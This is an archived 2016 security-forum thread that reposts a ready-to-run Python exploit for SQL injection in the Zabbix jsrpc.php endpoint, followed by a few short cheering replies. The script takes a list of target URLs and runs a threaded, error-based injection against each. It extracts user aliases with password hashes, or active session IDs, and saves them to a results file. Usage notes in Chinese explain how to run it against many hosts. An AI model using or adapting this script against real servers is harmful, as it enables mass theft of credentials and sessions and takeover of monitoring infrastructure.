Select Browser Mobile | Continue

Silic Group Froum Archive - Silic Security

 Forgot Password?
 Join Us
Search
Show: 860|Reply: 5

[转载] zabbix的jsrpc.php注入py利用脚本

[Copy URL]
Posted 2016-8-22 10:56:58 | Show all replies |Read Mode
  1. #coding=utf-8
  2. import Queue
  3. import threading
  4. import re
  5. import requests
  6. import time
  7. import argparse
  8. import urlparse
  9. lock = threading.Lock()


  10. class WorkManager(object):
  11.     def __init__(self,filepath,action,thread_num):
  12.         self.work_queue=Queue.Queue()
  13.         self.threads=[]
  14.         all_urls=self.all_target_url(filepath)
  15.         self.init_work_queue(all_urls,action)
  16.         self.init_thread_pool(thread_num)

  17.     def init_work_queue(self,all_urls,action):
  18.         if action=='password':
  19.             for url in all_urls:
  20.                 self.work_queue.put((getpass,url))
  21.         elif action=='session':
  22.             for url in all_urls:
  23.                 self.work_queue.put((getsession, url))

  24.     def init_thread_pool(self,thread_num):
  25.         for i in range(thread_num):
  26.             self.threads.append(Work(self.work_queue))

  27.     def wait_allcomplete(self):
  28.         for item in self.threads:
  29.             if item.isAlive():
  30.                 item.join()

  31.     def all_target_url(self,filepath):

  32.         all_urls=open(filepath).readlines()
  33.         all_urls=[url.strip() for url in all_urls]
  34.         return all_urls


  35. class Work(threading.Thread):
  36.     def __init__(self, work_queue):
  37.         threading.Thread.__init__(self)
  38.         self.work_queue = work_queue
  39.         self.start()

  40.     def run(self):
  41.         while True:
  42.             try:
  43.                 do, args = self.work_queue.get(block=False)
  44.                 do(args)
  45.                 self.work_queue.task_done()
  46.             except:
  47.                 break

  48. def getpass(url,num=5):
  49.     results=[]

  50.     for x in range(0,num):
  51.         try:
  52.             payload = '/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 1 from (select count(*),concat(floor(rand(0)*2), (select concat(alias,0x3a,passwd) from zabbix.users limit %s,1))x from information_schema.character_sets group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1'%str(x)
  53.             url=url+payload
  54.             text=requests.get(url).content
  55.             pat = re.compile(r"\[Duplicate entry '1(.+?)'", re.S)
  56.             result = re.findall(pat, text)[0]
  57.             results.append(result)

  58.         except Exception, e:
  59.             break
  60.     print urlparse.urlparse(url).netloc + 'Done!!\n'
  61.     lock.acquire()
  62.     f.write('%s\n'%urlparse.urlparse(url).netloc)
  63.     for x in results:
  64.         f.write('%s\n'%x)
  65.     f.write('\n\n')
  66.     lock.release()


  67. def getsession(url,num=5):
  68.     results=[]
  69.     for x in range(0, num):
  70.         try:
  71.             payload = '/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&\
  72.     hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 2333 from (select count(*),concat(floor\
  73.         (rand(0)*2), (select concat(0x7e,0x7e,sessionid,0x7e,0x7e) from sessions limit %s,1))x from information_schema.character_sets \
  74. group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=\
  75. showlatest&filter=&filter_task=&mark_color=1'  % str(x)
  76.             url = url + payload
  77.             text = requests.get(url).content
  78.             pat = re.compile(r"\[Duplicate entry '1~~(.*?)~~", re.S)
  79.             result = re.findall(pat, text)[0]
  80.             results.append(result)
  81.         except Exception, e:
  82.             break

  83.     print urlparse.urlparse(url).netloc + 'Done!!\n'
  84.     lock.acquire()
  85.     f.write('%s\n' % urlparse.urlparse(url).netloc)
  86.     for x in results:
  87.         f.write('%s\n' % x)
  88.     f.write('\n\n')
  89.     lock.release()


  90. if __name__ == '__main__':
  91.     logo = '''\n
  92.      _____     _     _     _      _____           _
  93.     |__  /__ _| |__ | |__ (_)_  _|  ___|   _  ___| | __
  94.       / // _` | '_ \| '_ \| \ \/ / |_ | | | |/ __| |/ /
  95.      / /| (_| | |_) | |_) | |>  <|  _|| |_| | (__|   <
  96.     /____\__,_|_.__/|_.__/|_/_/\_\_|   \__,_|\___|_|\_\

  97.     \n  **************coded by Faith4444 2016-8-19*****************
  98.     '''
  99.     print logo
  100.     start = time.time()
  101.     parser = argparse.ArgumentParser(description = 'Zabbix Sql Injection')
  102.     parser.add_argument('--action', action = 'store', dest = 'action')
  103.     parser.add_argument('--file', action = 'store', dest = 'file')
  104.     parser.add_argument('--threads', action='store', dest='threads',default="10",type=int)
  105.     given_args = parser.parse_args()
  106.     action = given_args.action
  107.     filepath = given_args.file
  108.     thread_num = given_args.threads
  109.     f=open('result.txt','w')
  110.     work_manager = WorkManager(filepath,action,thread_num)
  111.     work_manager.wait_allcomplete()
  112.     end = time.time()
  113.     f.close()
  114.     print "time:%s"%(end-start)
  115.        
  116.         '''
  117.         获取session(默认取5条)          exp.py --file=urls.txt --action=session
  118. 获取password(默认取5条)      exp.py --file=urls.txt --action=password
  119. 自定义线程(默认10)                    exp.py --file=urls.txt --action=password  --threads 20
  120. j结果会保存在当前目录下的result.txt里面
  121.         '''
  122.        
Copy


流弊的小白 The user has been deleted
Posted 2016-8-23 04:08:46 | Show all replies
么么哒         
liaohaohao123 The user has been deleted
Posted 2016-8-26 14:31:51 | Show all replies

么么哒   
么么哒   
冷尊 The user has been deleted
Posted 2016-8-26 23:23:33 | Show all replies
么么哒
Posted 2016-8-27 10:47:54 | Show all replies
么么哒
zxcvbnm The user has been deleted
Posted 2016-8-29 10:03:08 | Show all replies
么么哒哒哒
You need to login before reply! Login | Join Us

Credit Rules of This Forum

Close

公告Privious /1 Next

小黑屋|手机版|Archiver|Silic Security

GMT+8, 2017-2-27 16:55

© 2001-2014 Silic Corp.

Quick Reply Top Return List